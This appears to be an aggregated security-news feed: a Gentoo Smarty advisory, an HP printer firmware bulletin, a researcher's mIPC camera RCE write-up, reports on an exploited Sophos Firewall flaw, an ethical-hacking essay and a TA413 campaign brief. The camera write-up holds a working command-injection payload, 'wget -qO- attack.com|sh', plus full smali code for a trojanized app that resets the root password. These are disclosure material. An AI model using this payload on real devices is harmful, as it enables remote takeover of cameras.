Gentoo Linux Security Advisory 202209-9 - Multiple vulnerabilities have been found in Smarty, the worst of which could result in remote code execution. Versions less than 4.2.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202209-09  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Smarty: Multiple vulnerabilities  
     Date: September 25, 2022  
     Bugs: #830980, #845180, #870100  
       ID: 202209-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in Smarty, the worst of which  
could result in remote code execution

Background  
==========

Smarty is a template engine for PHP. The "template security" feature of  
Smarty is designed to help reduce the risk of a system compromise when  
you have untrusted parties editing templates.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  dev-php/smarty             < 4.2.1                      >= 4.2.1

Description  
===========

Multiple vulnerabilities have been discovered in Smarty. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Smarty users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-php/smarty-4.2.1"

References  
==========

[ 1 ] CVE-2018-25047  
      https://nvd.nist.gov/vuln/detail/CVE-2018-25047  
[ 2 ] CVE-2021-21408  
      https://nvd.nist.gov/vuln/detail/CVE-2021-21408  
[ 3 ] CVE-2021-29454  
      https://nvd.nist.gov/vuln/detail/CVE-2021-29454  
[ 4 ] CVE-2022-29221  
      https://nvd.nist.gov/vuln/detail/CVE-2022-29221

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202209-09

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202209-09

Certain HP Print Products are potentially vulnerable to Buffer Overflow.

**hp-concentra-wrapper-portlet**

 Actions

Certain HP Print Products are potentially vulnerable to Buffer Overflow and/or Remote Code Execution.

Severity

Critical

HP Reference

HPSBPI03810 rev. 1

Release date

September 21, 2022

Last updated

September 21, 2022

Category

Print

Potential Security Impact

Potential Buffer Overflow, Remote Code Execution

**Relevant Common Vulnerabilities and Exposures (CVE) List**

List of CVE IDs    

CVE ID

CVSS

Severity

Vector

CVE-2022-28721

9.8

Critical

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2022-28722

7.1

High

CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

PSR-2022-0021

**Resolution**

Update your printer firmware.

HP has provided firmware updates for potentially affected products listed in the table below. To obtain the updated firmware listed below, go to the HP Software and Driver Downloads, and then search for your printer model.

**Affected products**

Find the products affected and the firmware version that resolves the vulnerabilities.

**HP inkjet printers**

Review the table for affected HP inkjet printers, and the updated firmware version.

Affected products     

Product Name

Product Number

CVE-2022-28721 (CVSS 9.8)

CVE-2022-28722 (CVSS 7.3)

Updated Firmware Version

HP DeskJet Ink Advantage 5000 All-in-One Printer series

M2U86A, M2U86B, M2U86C, M2U87A, M2U87B, M2U88B, M2U89B

Affected

Not Affected

2211A or higher

HP DeskJet Ink Advantage 5200 All-in-One Printer series

M2U76A, M2U77A

Affected

Not Affected

2211C or higher

HP DeskJet Plus Ink Advantage 6000 All-in-One Printer series

5SE522A

Affected

Not Affected

001.2214A or higher

HP DeskJet Plus Ink Advantage 6400 All-in-One Printer series

5SD78A, 5SD79A

Affected

Not Affected

001.2214A or higher

HP ENVY 5000 All-in-One Printer series

M2U85B, Z4A59A, Z4A71A, M2U91B, Z4A69A, M2U92B, Z4A70A, M2U94B, Z4A73A, Z4A74A, M2U91A, M2U92A, M2U85A, M2U94A, Z4A54A, Z4A60A, Z4A61A, Z4A61B

Affected

Not Affected

2211C or higher

HP ENVY 6000 All-in-One Printer series

5SE17A, 6WD35A, 7CZ37A, 5SE18A, 5SE16A, 5SE19A, 5SE20A, 8QQ97A, 8QQ98A, 8QQ99A

Affected

Not Affected

001.2214B or higher

HP ENVY 6000e All-In-One Printer series

223N6A, 2K4V8A, 2K4W1A, 2K4W2A, 223N2A, 223N1A, 223N5A, 223N9A

Affected

Not Affected

001.2216A or higher

HP ENVY 6400e All-In-One Printer series

223R6A, 2K5L5A, 223R2A, 223R1A, 223R3A, 223R9A

Affected

Not Affected

001.2216A or higher

HP ENVY Photo 6200 All-in-One Printer series

K7G22A, K7G18A, K7G23A, Y0K15A, K7D05A

Affected

Not Affected

003.2220B or higher

HP ENVY Photo 7100 All-in-One Printer series

Z3M37A, K7G93A, Z3M52A, 3XD89A, K7G95A, K7G96A, K7G99A

Affected

Not Affected

003.2220B or higher

HP ENVY Photo 7800 All-in-One Printer series

K7R96A, K7S00A, K7S08A, K7S01A

Affected

Not Affected

003.2220B or higher

HP ENVY Pro 6400 All-in-One Printer series

5SE46A, 6WD14A, 6WD16A, 5SE47A, 5SE45A, 5SE48A, 7XK12A, 5SE50A, 8QQ86A, 8QQ87A, 8QQ88A

Affected

Not Affected

001.2214B or higher

HP OfficeJet 5200 All-in-One Printer series

M2U81A, Z4B29A, M2U81B, Z4B27A, M2U82B, Z4B28A, M2U84B, M2U82A, M2U75A, M2U84A, Z4B12A, Z4B13A, Z4B14A, Z4B18A

Affected

Not Affected

2211A or higher

HP OfficeJet 6950 All-in-One Printer series

P4C78A, P4C85A, T3P03A, P4C86A, P4C81A, P4C82A, P4C84A

Affected

Affected

001.2224A or higher

HP OfficeJet 6960 All-in-One Printer series

T0G25A, T0G26A

Affected

Affected

001.2225A or higher

HP OfficeJet 8010 All-in-One Printer series

1KR69A, 1KR58A

Affected

Not Affected

001.2213A or higher

HP OfficeJet 8010e All-in-One Printer series

228F5A

Affected

Not Affected

004.2222A or higher

HP OfficeJet 8022 All-in-One Printer

3UC65A

Affected

Not Affected

001.2213A or higher

HP OfficeJet 8022e All-in-One Printer

1K7K6A

Affected

Not Affected

004.2222A or higher

HP OfficeJet Pro 6960 All-in-One Printer series

J7K33A, T0F30A, T0F32A, T0F38A, T0F31A, J7K37A, J7K38A, J7K35A, J7K39A, T0F28A, T0F36A

Affected

Affected

001.2225A or higher

HP OfficeJet Pro 6970 All-in-One Printer series

J7K34A, T0F33A, T0F39A, T0F34A, T0F35A, J7K40A, J7K36A, J7K42A, J7K41A, T0F29A, T0F37A, T0F40A

Affected

Affected

001.2225A or higher

HP OfficeJet Pro 7720 Wide Format All-in-One Printer series

G5J56A, Y0S18A

Affected

Affected

003.2226A or higher

HP OfficeJet Pro 7730 Wide Format All-in-One Printer

L3T99A, Y0S19A

Affected

Affected

003.2226A or higher

HP OfficeJet Pro 7740 Wide Format All-in-One Printer series

G5J38A, T1P99A

Affected

Affected

002.2226A or higher

HP OfficeJet Pro 8020 All-in-One Printer series

1KR62A, 5LJ17A, 5LJ18A, 5LJ19A, 1KR57A, 1KR61A

Affected

Not Affected

001.2213A or higher

HP OfficeJet Pro 8020e All-in-One Printer series

1K7K7A

Affected

Not Affected

004.2222A or higher

HP OfficeJet Pro 8030 All-in-One Printer series

1KR62A, 5LJ17A, 5LJ18A, 5LJ19A, 1KR57A, 1KR61A, 3UC64A

Affected

Not Affected

001.2213A or higher

HP OfficeJet Pro 8030e All-in-One Printer series

5LJ14A, 5LJ15A, 5LJ16A, 3UC66A, 4KJ65A, 5LJ23A

Affected

Not Affected

004.2222A or higher

HP OfficeJet Pro 8035e All-in-One Printer

1L0H6A, 1L0H7A, 1L0H8A

Affected

Not Affected

004.2222A or higher

HP OfficeJet Pro 8210 Printer series

D9L63A, D9L64A, J3P65A, J3P66A, J3P67A, J3P68A, T0G70A

Affected

Affected

001.2225B or higher

HP OfficeJet Pro 8710 All-in-One Printer series

D9L18A, M9L66A, M9L67A, T0G46A, J6X76A, J6X78A, J6X80A, K7S37A, M9L70A, J6X77A, J6X81A, J6X79A, K7S38A, T0G47A, T0G48A, T0G49A, M9L65A

Not Affected

Affected

001.2224B or higher

HP OfficeJet Pro 8730 All-in-One Printer

D9L20A, K7S32A

Affected

Affected

001.2225B or higher

HP OfficeJet Pro 8740 All-in-One Printer series

D9L21A, K7S42A, T0G65A, K7S39A, J6X83A, K7S43A, K7S40A, K7S41A

Affected

Affected

001.2225B or higher

HP OfficeJet Pro 9010 All-in-One Printer series

1KR46A, 3UK83A, 1KR49A, 1KR42A, 1KR45A, 3UK84A, 1KR48A, 1KR54A, 1KR55A

Affected

Not Affected

002.2211C or higher

HP OfficeJet Pro 9010e All-in-One Printer series

257G3A

Affected

Not Affected

005.2210A or higher

HP OfficeJet Pro 9020 All-in-One Printer series

1MR78A, 1MR66A, 1MR67A, 1MR69A, 1MR70A, 1MR71A, 1MR72A, 1MR73A, 1MR74A, 1MR75A, 1MR76A, 1MR77A, 1MR68A, 1MR79A

Affected

Not Affected

002.2211C or higher

HP OfficeJet Pro 9020e All-in-One Printer series

226Y9A, 1G5M0A

Affected

Not Affected

005.2210A or higher

HP Smart Tank 510 Wireless All-in-One series / HP Smart Tank Plus 550 Wireless All-in-One series

4SB23A, 3YW71A, 3YW74A, 1TJ09A, 3YW70A, 1TJ10A, 1TJ11A, 3YW73A, 6HF11A, 1TJ12A, 3YW72A, 3YW75A

Affected

Not Affected

001.2219A or higher

HP Smart Tank 610 Wireless All-in-One series / HP Smart Tank Plus 650 Wireless All-in-One series

Y0F71A, Y0F72A, Y0F73A, 7XV38A, Y0F74A, 3YW48A, 3YW51A

Affected

Not Affected

001.2219A or higher

HP Tango / HP Tango X

3DP64A, 3DP65A, 3DP66A, 3YF56A, 3YF57A, 3YF58A, 3YF60A, 3YF61A, 2RY54A, 2RY55A, 2RY56A, 3YF65A, 3YF66A, 3YF67A, 3YF68A, 3YF69A, 3YF70A, 3YF59A

Affected

Not Affected

2209A or higher

**HP LaserJet Pro printers**

Review the table for affected HP LaserJet Pro printers, and the updated firmware version.

Affected products     

Product Name

Product Number

CVE-2022-28721 (CVSS 9.8)

CVE-2022-28722 (CVSS 7.3)

Updated Firmware Version

HP Color LaserJet MFP M478-M479 series

W1A75A, W1A76A, W1A77A, W1A81A, W1A82A, W1A79A, W1A80A, W1A78A

Affected

Not Affected

002\_2208A or higher

HP Color LaserJet Pro M453-M454 series

W1Y40A, W1Y41A, W1Y46A, W1Y47A, W1Y44A, W1Y45A, W1Y43A

Affected

Not Affected

002\_2208A or higher

HP LaserJet Pro M304-M305 Printer series

W1A66A, W1A46A, W1A47A, W1A48A

Affected

Not Affected

002\_2208A or higher

HP LaserJet Pro M404-M405 Printer series

W1A51A, W1A53A, W1A56A, W1A63A, W1A52A, 93M22A, W1A58A, W1A59A, W1A60A, W1A57A

Affected

Not Affected

002\_2208A or higher

HP LaserJet Pro MFP M428-M429 f series

W1A29A, W1A32A, W1A30A, W1A38A, W1A34A, W1A35A

Affected

Not Affected

002\_2208A or higher

HP LaserJet Pro MFP M428-M429 series

W1A28A, W1A31A, W1A33A

Affected

Not Affected

002\_2208A or higher

**HP PageWide Pro printers**

Review the table for affected HP PageWide Pro printers, and the updated firmware version.

Affected products     

Product Name

Product Number

CVE-2022-28721 (CVSS 9.8)

CVE-2022-28722 (CVSS 7.3)

Updated Firmware Version

HP PageWide 352dw Printer

J6U57A

Affected

Affected

2228B or higher

HP PageWide 377dw Multifunction Printer

J9V80A

Affected

Affected

2228B or higher

HP PageWide Managed P55250dw Printer series

J6U55A, J6U51B, J6U55B

Affected

Affected

2228B or higher

HP PageWide Managed P57750dw Multifunction Printer

J9V82A

Affected

Affected

2228B or higher

HP PageWide Managed P75050dn/dw

W1B28A, Y3Z45A W1B29A, Y3Z47A

Affected

Affected

006.2225A or higher

HP PageWide Managed P77740dn Multifunction Printer

Y3Z57A

Affected

Affected

006.2225A or higher

HP PageWide Managed P77740dw Multifunction Printer

W1B33A

Affected

Affected

006.2225A or higher

HP PageWide Managed P77740z Multifunction Printer

W1B39A

Affected

Affected

006.2225A or higher

HP PageWide Managed P77750z Multifunction Printer

W1B37A

Affected

Affected

006.2225A or higher

HP PageWide Managed P77760z Multifunction Printer

W1B38A

Affected

Affected

006.2225A or higher

HP PageWide Pro 452dn Printer series

D3Q15A

Affected

Affected

2228B or higher

HP PageWide Pro 452dw Printer series

D3Q16A

Affected

Affected

2228B or higher

HP PageWide Pro 477dn Multifunction Printer series

D3Q19A

Affected

Affected

2228B or higher

HP PageWide Pro 477dw Multifunction Printer series

D3Q20A

Affected

Affected

2228B or higher

HP PageWide Pro 552dw Printer series

D3Q17A

Affected

Affected

2228B or higher

HP PageWide Pro 577 Multifunction Printer series

D3Q21A, K9Z76A

Affected

Affected

2228B or higher

HP PageWide Pro 750dn Printer

Y3Z44A

Affected

Affected

006.2225A or higher

HP PageWide Pro 750dw Printer

A7W93A, Y3Z46A

Affected

Affected

006.2225A or higher

HP PageWide Pro 772dn Multifunction Printer

Y3Z54A

Affected

Affected

006.2225A or higher

HP PageWide Pro 772dw Multifunction Printer

W1B31A

Affected

Affected

006.2225A or higher

**Revision history**

This document has been revised according to the information below.

List of versions   

Version

Description

Date

1

Initial Release

September 21, 2022

**Additional information**

Follow these links for additional information.

Third-party security patches

Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support

For issues about implementing the recommendations of this Security Bulletin, visit http://www.hp.com/go/contacthp to learn about your HP support options.

Report

To report a potential security vulnerability with any HP supported product, send email to: hp-security-alert@hp.com.

Subscribe

To initiate a subscription to receive future HP Security Bulletin alerts via email, visit https://h41369.www4.hp.com/alerts-signup.php?lang=en&cc=US&jumpid=hpsc\_profile.

Security bulletin archive

To view released Security Bulletins, visit https://support.hp.com/security-bulletins.

It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.

Download HP’s security-alert PGP key

**Legal information**

System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Security Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Security Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.

© Copyright 2022 HP Development Company, L.P.

HP Inc. (HP) shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP nor its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. "HP Inc.," "HP" and the names of HP products referenced herein are trademarks of HP Inc. or its affiliates in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

CVE-2022-28722: Certain HP Print Products - Potential Buffer Overflow, Remote Code Execution

Unsanitized input when setting a locale file leads to shell injection in mIPC camera firmware 5.3.1.2003161406. This allows an attacker to gain remote code execution on cameras running the firmware when a victim logs into a specially crafted mobile app.

\# mIPC firmware RCE By Joshua Wang Firmware version: v5.3.1.2003161406 (latest?) ## Overview Unsanitized input when setting a \`UTC(\\+|\\-).\*\` locale file leads to shell injection. A stack-based buffer overflow also exists. This allows an attacker to gain remote code execution, but requires the attacker to be authenticated in the mobile application to interface with the camera running mIPC. ## Vulnerability After receiving a firmware dump of a Lefun camera, which runs mIPC firmware, I noted the following in the startup process: - telnetd is killed - the root password is randomized and effectively un-bruteforceable I turned to searching through the mIPC binary for calls to \`system\`, looking for possible injections. The mIPC mobile application allows one to choose the timezone that the camera's system should operate with. I believe this is used for the on-screen display's time feature. One thing that stood out to me is that the firmware dump also included various different locale files for setting a timezone. \`\`\` ./backupfs/apps/app/ipc/data/cfg/zoneinfo/ ├── UTC+00\_00 ├── UTC+01\_00 ├── UTC-01\_00 ├── UTC+02\_00 ├── UTC-02\_00 ├── UTC+03\_00 ├── UTC-03\_00 ├── UTC+03\_30 ├── UTC-03\_30 ├── UTC+04\_00 ├── UTC-04\_00 ├── UTC+04\_30 ├── UTC-04\_30 ├── UTC+05\_00 ├── UTC-05\_00 ├── UTC+05\_30 ├── UTC+05\_45 ├── UTC+06\_00 ├── UTC-06\_00 ├── UTC+06\_30 ├── UTC+07\_00 ├── UTC-07\_00 ├── UTC+08\_00 ├── UTC-08\_00 ├── UTC+09\_00 ├── UTC-09\_00 ├── UTC+09\_30 ├── UTC-09\_30 ├── UTC+10\_00 ├── UTC-10\_00 ├── UTC+10\_30 ├── UTC+11\_00 ├── UTC-11\_00 ├── UTC+12\_00 ├── UTC+13\_00 └── UTC+14\_00 \`\`\` The vulnerable function is found at offset \`0x0013e91c\`. I re-labeled and re-typed the decompilation in Ghidra. \`\`\`c int choose\_utc\_timezone(undefined4 param\_1,char \*param\_2) { int iVar1; char \*pcVar2; char acStack192 \[128\]; char acStack64 \[40\]; if (param\_2 == (char \*)0x0) { iVar1 = -1; } else { strcpy(acStack64,param\_2); pcVar2 = strchr(acStack64,0x3a); if (pcVar2 != (char \*)0x0) { \*pcVar2 = '\_'; } iVar1 = access("/etc/TZ",0); if (iVar1 == 0) { sprintf(acStack192, "cp ../../../apps/app/ipc/data/cfg/zoneinfo/%s /etc/TZ; cp /etc/TZ ../data/; ", acStack64); system(acStack192); } else { sprintf(acStack192, "cp ../../../apps/app/ipc/data/cfg/zoneinfo/%s /etc/localtime; cp /etc/localtime ../ data/; " ,acStack64); system(acStack192); iVar1 = 0; } } return iVar1; } \`\`\` It appears that the name of a timezone filename is passed in through \`param\_2\`. It is then strcpy'd to \`acStack64\`. Then, it is formatted into a shell command using \`sprintf\` and then passed to \`system\`. The command copies a selected locale file from the previously mentioned directory into \`/etc/TZ\`, effectively setting the locale. It is important to note that mIPC by default uses another method to set a timezone besides copying a locale file, but these were not (to my knowledge) vulnerable due to sanitization. In this function, we can see two vulnerabilities. First, the \`strcpy\` allows us to copy more than 40 bytes into \`acStack64\`. One may argue that a length check occurred outside of this function, but I verified it experimentally and it indeed crashed the binary. Second, we can command-inject our way into the system! We just need our input to start with a valid locale filename (\`UTC+01\_00\`, etc) in order for the binary to reach this function (I also verified this experimentally). I could not find the parent calling function, but it may be that the developer used a \`strncmp\` and only verified the first couple bytes of input to match a valid locale filename. ## Exploitation I decided to exploit the command injection. Using APKtool, I dumped the mIPC mobile application and reverse engineered the behavior that sets timezones. I first instantiated a \`mcld\_ctx\_time\_set\` object. The definition for it: \`\`\` .class public Lcom/mining/cloud/bean/mcld/mcld\_ctx\_time\_set; .super Lcom/mining/cloud/bean/mcld/mcld\_ctx; .source "mcld\_ctx\_time\_set.java" # instance fields .field public auto\_sync:I .field public day:I .field public hour:I .field public min:I .field public mon:I .field public ntp\_addr:Ljava/lang/String; .field public sec:I .field public timezone:Ljava/lang/String; .field public type:Ljava/lang/String; .field public year:I # direct methods .method public constructor <init>()V .locals 0 .line 6 invoke-direct {p0}, Lcom/mining/cloud/bean/mcld/mcld\_ctx;-><init>()V return-void .end method \`\`\` The locale filename (\`param\_2\`) is expected in the \`timezone\` field. Because of the buffer overflow, we are constrainted to < 40 characters in this injection, including the bytes at the beginning for a valid locale filename. Otherwise, we will crash the mIPC binary. To circumvent this, I decided to host my actual payload on a remote server, and execute it by calling \`wget\` and piping the output into \`sh\`. This gives me unlimited access to the shell. I set: - type == \`NTP\` - timezone == \`UTC+01\_00;wget -qO- attack.com|sh #\` - auto\_sync = 1 - sn == a serial number I got from calling \`McldActivityLivePlay->mSerialNumber\` - handler == \`McldActivityLivePlay->customTimeSetHandler\` I then invoked \`mcld\_agent->time\_set\` with this object and a couple other retrieved configurations to set the locale. See \[here\](#Full-payload) for the full thing. My remote payload just consisted of changing the root password with \`echo "root:root" | chpasswd\` and starting telnetd. Recall that the root password is randomized on startup. To make it easier for my coworker, Chris, to collect data (we were remote), I embedded my exploit into the \`onCreate\` method of the \`McIdActivityLivePlay\` class. This meant as soon as someone views the camera, the attack is run. I re-compiled the application with apktool, signed it, and installed it via ADB. !\[\](https://i.imgur.com/fBdlPHf.png) ## Full payload I learned way too much about Dalvik. \`\`\` new-instance v1, Lcom/mining/cloud/bean/mcld/mcld\_ctx\_time\_set; invoke-direct {v1}, Lcom/mining/cloud/bean/mcld/mcld\_ctx\_time\_set;-><init>()V const-string v2, "NTP" iput-object v2, v1, Lcom/mining/cloud/bean/mcld/mcld\_ctx\_time\_set;->type:Ljava/lang/String; const-string v2, "UTC+01\_00;wget -qO- attack.com|sh #" iput-object v2, v1, Lcom/mining/cloud/bean/mcld/mcld\_ctx\_time\_set;->timezone:Ljava/lang/String; const/4 v2, 0x1 iput v2, v1, Lcom/mining/cloud/bean/mcld/mcld\_ctx\_time\_set;->auto\_sync:I iget-object v2, p0, Lcom/mining/cloud/activity/McldActivityLivePlay;->mSerialNumber:Ljava/lang/String; iput-object v2, v1, Lcom/mining/cloud/bean/mcld/mcld\_ctx\_time\_set;->sn:Ljava/lang/String; iget-object v2, p0, Lcom/mining/cloud/activity/McldActivityLivePlay;->customTimeSetHandler:Landroid/os/Handler; iput-object v2, v1, Lcom/mining/cloud/bean/mcld/mcld\_ctx\_time\_set;->handler:Landroid/os/Handler; iget-object v3, p0, Lcom/mining/cloud/activity/McldActivityLivePlay;->mApp:Lcom/mining/cloud/application/McldApp; iget-object v3, v3, Lcom/mining/cloud/application/McldApp;->mAgent:Lcom/mining/cloud/mcld\_agent; invoke-virtual {v3, v1}, Lcom/mining/cloud/mcld\_agent;->time\_set(Lcom/mining/cloud/bean/mcld/mcld\_ctx\_time\_set;)V \`\`\`

CVE-2022-40785: mIPC firmware RCE - HackMD

Code injection vulnerability harnessed in attacks on south Asia

John Leyden 26 September 2022 at 14:02 UTC  
Updated: 27 September 2022 at 08:50 UTC

Code injection vulnerability harnessed in attacks on south Asia

A recently resolved vulnerability in Sophos Firewall has been abused by attackers in targeted attacks, the vendor warns.

The critical vulnerability (CVE-2022-3236) poses a remote code execution (RCE) risk.

Sophos Firewall v19.0 MR1 (19.0.1) and older are potentially vulnerable to the security bug in the User Portal and Webadmin of Sophos Firewall.

Catch up on the latest network security news

In a security advisory published on Friday (September 23), Sophos said that it has issued a patch that installs automatically in default installations of its firewall technology.

This is just as well given the vulnerability has already featured in attacks in the wild.

“Sophos has observed this vulnerability being used to target a small set of specific organizations, primarily in the South Asia region,” the vendor’s advisory said. “We have informed each of these organizations directly.

“Sophos will provide further details as we continue to investigate,” it added.

Short of applying a patch, the vulnerability might be mitigated by disabling WAN access to the User Portal and Webadmin, Sophos advises.

The Daily Swig asked Sophos to explain in what ways the vulnerability has been exploited and how the problem was discovered.

In response, Sophos said it was alerted about the zero-day vulnerability by one of its customers. The vendor went on to reiterate that few of its customers were affected by the problem – without saying what issues they may have faced:

A customer notified Sophos, at which time Sophos took immediate steps to issue a hotfix, which was already applied last week. This only affected an extremely small subset of organizations.

The vulnerability is noteworthy since it represents a web security flaw in a network security product.

One infosec observer warned that the flaw is of the type that might lend itself to widespread abuse.

“This has a HIGH chance of mass exploitation, given the vulnerability is based on Code Injection (CWE-94) and if we look at the #CISA KEVs, at least 28 of those are Code Injection related,” said threat researcher Immanuel Chavoya in a post about the vulnerability on Twitter.

YOU MAY ALSO LIKE Vendor disputes seriousness of firewall plugin RCE flaw

Web security flaw in Sophos Firewall patched

Vendor patches code injection vulnerability harnessed in attacks on south Asia

John Leyden 26 September 2022 at 14:02 UTC

Vendor patches code injection vulnerability harnessed in attacks on south Asia

A recently resolved vulnerability in Sophos Firewall has been abused by attackers in targeted attacks, the vendor warns.

The critical vulnerability (CVE-2022-3236) poses a remote code execution (RCE) risk.

Sophos Firewall v19.0 MR1 (19.0.1) and older are potentially vulnerable to the security bug in the User Portal and Webadmin of Sophos Firewall.

Catch up on the latest network security news

In a security advisory published on Friday (September 23), Sophos said that it has issued a patch that installs automatically in default installations of its firewall technology.

This is just as well given the vulnerability has already featured in attacks in the wild.

“Sophos has observed this vulnerability being used to target a small set of specific organizations, primarily in the South Asia region,” the vendor’s advisory said. “We have informed each of these organizations directly.

“Sophos will provide further details as we continue to investigate,” it added.

Short of applying a patch, the vulnerability might be mitigated by disabling WAN access to the User Portal and Webadmin, Sophos advises.

The Daily Swig asked Sophos to explain in what ways the vulnerability has been exploited and how the problem was discovered.

In response, Sophos said it was alerted about the zero-day vulnerability by one of its customers. The vendor went on to reiterate that few of its customers were affected by the problem – without saying what issues they may have faced:

A customer notified Sophos, at which time Sophos took immediate steps issue a hotfix, which was already applied last week. This only affected an extremely small subset of organizations.

The vulnerability is noteworthy since it represents a web security flaw in a network security product.

One infosec observer warned that the flaw is of the type that might lend itself to widespread abuse.

“This has a HIGH chance of mass exploitation, given the vulnerability is based on Code Injection (CWE-94) and if we look at the #CISA KEVs, at least 28 of those are Code Injection related,” said threat researcher Immanuel Chavoya in a post about the vulnerability on Twitter.

YOU MAY ALSO LIKE Vendor disputes seriousness of firewall plugin RCE flaw

Attackers abuse web security flaw in Sophos Firewall

For white hats who play by the rules, here are several ethical tenets to consider.

Earlier this year when international cyber-gang Lapsus$ attacked major tech brands including Samsung, Microsoft, Nvidia and password manager Okta, an ethical line seemed to have been crossed for many cybercriminals.

Even by their murky standards, the extent of the breach, the disruption caused, and the profile of the businesses involved was just too much. So, the cybercrime community came together to punish Lapsus$ by leaking information on the group, a move that ultimately led to their arrest and breakup.

So maybe there's honor amongst thieves after all? Now, don't get me wrong; this isn't a pat on the back for cybercriminals, but it does indicate that at least some professional code is being followed.

Which raises a question for the wider law-abiding hacking community: Should we have our own ethical code of conduct? And if so, what might that look like?

**What Is Ethical Hacking?**

 First let's define ethical hacking. It is the process of assessing a computer system, network, infrastructure, or application with good intentions, to find vulnerabilities and security flaws that developers might have overlooked. Essentially, it's finding the weak spots before the bad guys do and alerting the organization, so it can avoid any big reputational or financial loss.

Ethical hacking requires, at a bare minimum, the knowledge and permission of the business or organization which is the subject of your attempted infiltration.

Here are five other guiding principles for activity to be considered ethical hacking.

**Hack To Secure**

An ethical and white-hat hacker coming to assess the security of any company will look for vulnerabilities, not only in the system but also in the reporting and information handling processes. The goal these hackers is to discover vulnerabilities, provide detailed insights, and make recommendations for building a secure environment. Ultimately, they're looking to make the organization more secure.

**Hack Responsibly**

Hackers must ensure they have permission, outlining clearly the extent of access the company is giving, as well as the scope of the work they are doing. This is very important. Target knowledge, and a clear scope, help prevent any accidental compromises and establish solid lines of communication if the hacker uncovers anything alarming. Responsibility, timely communication, and openness are vital ethical principles to abide by, and clearly distinguish a hacker from a cybercriminal and from the rest of the security team.

**Document Everything**

All good hackers keep detailed notes of everything they do during an assessment and log all command and tool output. First and foremost, this is to protect themselves. For example, if an issue occurs during a penetration test, the employer will look to the hacker first. Having a timestamped log of the activities performed, be it exploiting a system or scanning for malware, gives piece of mind to organizations by reminding them that hackers work with them, not against them.

Good notes uphold the ethical and legal side of things; they are also the basis of the report hackers will produce, even when there are no major findings. The notes will allow them to highlight the issues they have identified, the steps needed to reproduce the issues, and detailed suggestions on how to fix them.

**Keep Communications Active**

Open and timely communications should be clearly defined in the contract. Staying in communication throughout an assessment is key. Good practice is to always notify when assessments are running; a daily email with the assessment run times is vital.

While the hacker might not need to report all the vulnerabilities they find immediately to their client contact, they still should flag any critical, show-stopping flaw during an external penetration test. This could be an exploitable unauthenticated RCE or SQLi, a malicious code execution, or sensitive data disclosure vulnerability. When encountering these, hackers stop testing, issue a written vulnerability notification via email, and follow up with a phone call. This gives teams on the business side the chance to pause and fix the issue immediately if they choose. It's irresponsible to let a flaw of this magnitude go unflagged until the report is issued weeks later.

Hackers should keep their main points of contact aware of their progress and any major issues they discover as they proceed. This ensures everyone is aware of any issues ahead of the final report.

**Have a Hacker Mindset**

The term hacking was used even before information security grew in importance. It just means to use things in unintended ways. For this, hackers first seek to understand all the intended use cases of a system and take into consideration all its components.

Hackers must keep developing this mindset and never stop learning. This allows them to think both from a defensive and an offensive perspective and is useful when looking at something you have never experienced before. By creating best practices, understanding the target, and creating attack paths, a hacker can deliver amazing results.

Should Hacking Have a Code of Conduct?

A China-aligned advanced persistent threat actor known as TA413 weaponized recently disclosed flaws in Sophos Firewall and Microsoft Office to deploy a never-before-seen backdoor called LOWZERO as part of an espionage campaign aimed at Tibetan entities.
Targets primarily consisted of organizations associated with the Tibetan community, including enterprises associated with the Tibetan

A China-aligned advanced persistent threat actor known as TA413 weaponized recently disclosed flaws in Sophos Firewall and Microsoft Office to deploy a never-before-seen backdoor called **LOWZERO** as part of an espionage campaign aimed at Tibetan entities.

Targets primarily consisted of organizations associated with the Tibetan community, including enterprises associated with the Tibetan government-in-exile.

The intrusions involved the exploitation of CVE-2022-1040 and CVE-2022-30190 (aka "Follina"), two remote code execution vulnerabilities in Sophos Firewall and Microsoft Office, respectively.

"This willingness to rapidly incorporate new techniques and methods of initial access contrasts with the group's continued use of well known and reported capabilities, such as the Royal Road RTF weaponizer, and often lax infrastructure procurement tendencies," Recorded Future said in a new technical analysis.

